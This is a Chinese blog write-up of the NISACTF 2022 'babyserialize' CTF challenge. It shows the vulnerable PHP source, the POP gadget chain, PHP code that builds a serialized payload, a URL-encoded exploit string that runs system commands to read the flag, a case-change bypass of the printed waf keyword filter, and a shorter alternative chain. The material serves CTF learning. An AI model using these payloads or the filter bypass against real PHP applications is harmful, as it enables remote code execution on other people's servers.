(反序列化)[NISACTF 2022]babyserialize

已于 2023-12-02 22:08:16 修改
阅读量360 收藏 5
点赞数 9
分类专栏: web反序列化 文章标签: php web 学习
于 2023-11-24 17:01:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73668856/article/details/134602610
版权

题目

<?php
include "waf.php";
class NISA{
    public $fun="show_me_flag";
    public $txw4ever;
    public function __wakeup()
    {
        if($this->fun=="show_me_flag"){
            hint();
        }
    }

    function __call($from,$val){
        $this->fun=$val[0];
    }

    public function __toString()
    {
        echo $this->fun;
        return " ";
    }
    public function __invoke()
    {
        checkcheck($this->txw4ever);
        @eval($this->txw4ever);
    }
}

class TianXiWei{
    public $ext;
    public $x;
    public function __wakeup()
    {
        $this->ext->nisa($this->x);
    }
}

class Ilovetxw{
    public $huang;
    public $su;

    public function __call($fun1,$arg){
        $this->huang->fun=$arg[0];
    }

    public function __toString(){
        $bb = $this->su;
        return $bb();
    }
}

class four{
    public $a="TXW4EVER";
    private $fun='abc';

    public function __set($name, $value)
    {
        $this->$name=$value;
        if ($this->fun = "sixsixsix"){
            strtolower($this->a);
        }
    }
}

if(isset($_GET['ser'])){
    @unserialize($_GET['ser']);
}else{
    highlight_file(__FILE__);
}

//func checkcheck($data){
//  if(preg_match(......)){
//      die(something wrong);
//  }
//}

//function hint(){
//    echo ".......";
//    die();
//}
?>

首先看见存在hint()的注释,代码中也存在触发这个hint()的代码

http://node5.anna.nssctf.cn:28752/?ser=O:4:"NISA":1:{s:3:"fun";s:12:"show_me_flag";}

flag is in /

找利用点,存在eval函数

且上面存在checkcheck函数,是过滤的函数,但是不知道具体是什么

先构造链子

NISA::__invoke -> ilovetxw::__tostring -> four::__set -> ilovetxw::__call -> tianxiwei::__wakeup

写payload

<?php
class NISA{
    public $fun;
    public $txw4ever;
}

class TianXiWei{
    public $ext;
    public $x;
}

class Ilovetxw{
    public $huang;
    public $su;
}

class four{
    public $a;
    private $fun;
}
$a = new NISA;
$a->txw4ever = 'system("ls /");';
$b = new Ilovetxw;
$b->su = $a;
$c = new four;
$c->a = $b;
$b->huang = $c;
$d = new TianXiWei;
$d->ext = $b;

echo urlencode(serialize($d));
?>

结果
O%3A9%3A%22TianXiWei%22%3A2%3A%7Bs%3A3%3A%22ext%22%3BO%3A8%3A%22Ilovetxw%22%3A2%3A%7Bs%3A5%3A%22huang%22%3BO%3A4%3A%22four%22%3A2%3A%7Bs%3A1%3A%22a%22%3Br%3A2%3Bs%3A9%3A%22%00four%00fun%22%3BN%3B%7Ds%3A2%3A%22su%22%3BO%3A4%3A%22NISA%22%3A2%3A%7Bs%3A3%3A%22fun%22%3BN%3Bs%3A8%3A%22txw4ever%22%3Bs%3A14%3A%22system%28%22ls+%2F%22%29%22%3B%7D%7Ds%3A1%3A%22x%22%3BN%3B%7D

提交出现somet wrong

即之前出现的checkcheck函数过滤

我不太懂为什么要大小写绕过

大小写绕过,改成 System("tac /f*");

出现flag

后记

打开waf.php看看

//waf.php
<?php
function checkcheck($data){
    if (preg_match("/\`|\^|\||\~|assert|\?|glob|sys|phpinfo|POST|GET|REQUEST|exec|pcntl|popen|proc|socket|link|passthru|file|posix|ftp|\_|disk/",$data,$match)){
        die('something wrong');
    }
}
function hint(){
    echo "flag is in /";
    die();
}
?>

只过滤了sys

可能和经验有关吧

大佬更短的链子

class NISA{
    public $txw4ever='SYSTEM("cat /f*");';
}
class Ilovetxw{
}

$a = new NISA();
$a->fun = new Ilovetxw();
$a->fun->su = $a;
$a = serialize($a);
echo $a;

解释
在NISA::__wakeup里,做弱比较的时候就能触发__toString

弱比较类型不同,会自动转换类型

接下来看看java,提升类的理解

_MOB_
关注
  • 9
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
[NISACTF 2022]babyserialize - 序列(waf绕过)【*】
oZuoShen123的博客
10-07 972
1、分析链条和属性   链条:`TianXiWeis(__wakeup)-> Ilovetxw(__call)-> four(__set) -> Ilovetxw(__toString)-> NISA(__invoke)`   属性:`TianXiWeis(ext=$i)-> Ilovetxw(huang=$f)-> four(fun="sixsixsix";a=$i)-> Ilovetxw(su=$n)-> NISA(txw4ever=命令)`
[NISACTF 2022]
snowlyzz的博客
09-09 5960
NISACTF部分WP
php序列——pop链构造[SWPUCTF 2021 新生赛]pop [NISACTF 2022]babyserialize
m0_73756016的博客
03-27 808
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的链条是(推)
关于[NISACTF 2022]babyserialize详解
weixin_57222016的博客
05-06 2368
前言 先甩出PHP的魔术方法。 __invoke():当尝试以调用函数的方式调用对象的时候,就会调用该方法 __construst():具有构造函数的类在创建新对象的时候,回调此方法 __destruct():序列的时候,或者对象销毁的时候调用 __wakeup():序列的时候调用 __sleep():序列的时候调用 __toString():把类当成字符串的时候调用,一般在echo处生效 __set():在给不可访问的(protected或者private)或者不存在的属性赋值的时候,会被调用
[NISACTF 2022]babyserialize
haosha。的博客
01-17 2601
[NISACTF 2022]babyserialize 题目做法及思路解析(个人分享)
[NISACTF 2022]上
qq_62046696的博客
07-26 3450
在php中变量名字是由数字字母和下划线组成的,所以不论用post还是get传入变量名的时候都将空格、+、点、[转换为下划线,但是用一个特性是可以绕过的,就是当[提前出现后,后面的点就不会再被转义了,suchas`CTF[SHOW.COM`=>`CTF_SHOW.COM`打开界面本来以为是简单的get传参,结果发现有的字符不能选中,选了好几下也不可以很蹊跷,仅仅想到了可能是代替的一些东西吧,然后csdn了一下。array1[]=1&array2[]=2本来觉得数组绕过就可以可是,发现输出了?...
pop链构造 [NISACTF 2022]babyserialize
m0_75178803的博客
02-26 1071
打开题目题目源代码如下代码审计一下//定义了一个名为NISA的类//检查$this->fun是否等于 "show_me_flag",如果是,则调用hint()函数hint();//当对象的方法不存在时,__call()$from表示调用的方法名,$val是一个数组,包含调用方法时传递的参数//将对象的属性$this->fun设置为传递给方法的第一个参数的值,即$val[0]return " ";//使用echo语句输出对象的属性。
c#序列序列
05-24
什么叫序列? 就是再把介质中的东西还原成对象,把石子还原成人的过程。 在进行这些操作的时候都需要这个可以被序列,要能被序列,就得给类头加[Serializable]特性。 通常网络程序为了传输安全才这么做。不...
java序列工具
11-21
java序列工具,覆盖jboss、weblogic、websphere。
C# xml序列序列
01-05
C# xml序列序列
weblogic10.3.6序列补丁包
06-22
weblogic10.3.6.0序列补丁包,p20780171_1036_Generic (2).zip补丁包和p22248372_1036012_Generic.zip升级包,要先安装升级包在安装补丁包
shiro序列脚本.zip
07-28
需要用到的俩个文件 ysoserial-master.jar 和 poc.py
深入解析PHP函数
最新发布
NatLindsay的博客
06-17 375
PHP函数是一种重要的编程概念,它可以帮助开发者组织和管理代码,提高代码的可重用性和可维护性。在PHP中,函数可以完成各种任务,从简单的数学计算到复杂的数据库查询和数据处理。本文将从多个角度探讨PHP函数的应用,涵盖了函数的定义和调用、内置函数的使用、自定义函数的创建以及常见的函数库。函数的参数:函数可以接受零个或多个参数,用于传递数据给函数内部使用。函数可以带有参数,用于接收输入,也可以返回值。函数命名:选择一个有意义的函数名,以便描述函数的功能。函数体:编写函数的具体实现代码,实现特定的功能。
ImageNet-1k 测试集 两大坑
weixin_42815846的博客
06-16 268
不然就会浪费一次提交机会,直接提交submission.txt就可以,注意每排5个预测结果,用于计算top5 error。2、用torchvision自带的imagenet dataset类加载进来的数据的类别标签,)但torchvision自动给你弄成。1、官方网站提交test set标签时,,但是他们的类别id不一样!以chickadee 山雀为例。这是torchvision的。他们的WNID都一样,
1. NAS和SAN存储
u010198709的博客
06-13 535
流程:存储端共享裸块设备,客户端连接存储映射出sdx的虚拟硬盘,客户端分区格式挂载使用。IQN名称格式: iqn.yyyy-mm.域名:自定义名称。用户名:openfiler, 密码:password。磁盘接口:SATA,SAS、NVME。支持nfs、cifs协议共享存储空间。nfs:适用于Linux、Unix。类型:IP SAN、FC SAN。cifs:适用于Windows。磁盘类型:机械硬盘、SSD。基于文件系统级别的共享。DAS 直接附加存储。NAS 网络附加存储。SAN 存储区域网络。
源码编译安装LAMP
潇的博客
06-12 920
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
初识形式验证工具——CPN tools
qq_47966193的博客
06-13 995
CPN Tools工具学习
软考初级网络管理员__网络单选题
2301_80961833的博客
06-12 998
部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了169.254.0.0范围内的地址。部分主机无法与该DHCP服务器正常通信,这些主机客户端系统自动生成了127.254.0.0范围内的地址。通过ARP协议可以获取目的端的MAC地址和UUID的地址。你必须先接入Internet,别人才可以给你发送电子邮件。只要你的E-Mai 地址有效,别人就可以给你发送电子邮件。你只有打开了自己的计算机,别人才可以给你发送电子邮件。关于虚拟局域网,下面的描述中错误的是()。
复杂xml序列序列
05-08
XML序列序列是将对象转换为XML格式或将XML格式转换回对象的过程。如果要序列序列复杂的XML结构,需要遵循以下步骤: 1. 创建XML文档对象并定义XML命名空间。 2. 创建与XML结构相对应的类和属性,并在类中使用XML属性和元素来定义XML序列序列的映射关系。 3. 应用类级别的序列属性,如XmlAttribute、XmlElement、XmlArray、XmlArrayItem等来控制序列序列过程中的细节。 4. 应用对象级别的序列属性,如XmlIgnore、XmlText等来控制序列序列过程中某些属性的行为。 5. 使用XmlSerializer类进行序列序列操作。 以上是复杂XML序列序列的一般步骤,具体实现需要根据实际情况进行调整和优

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

_MOB_

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值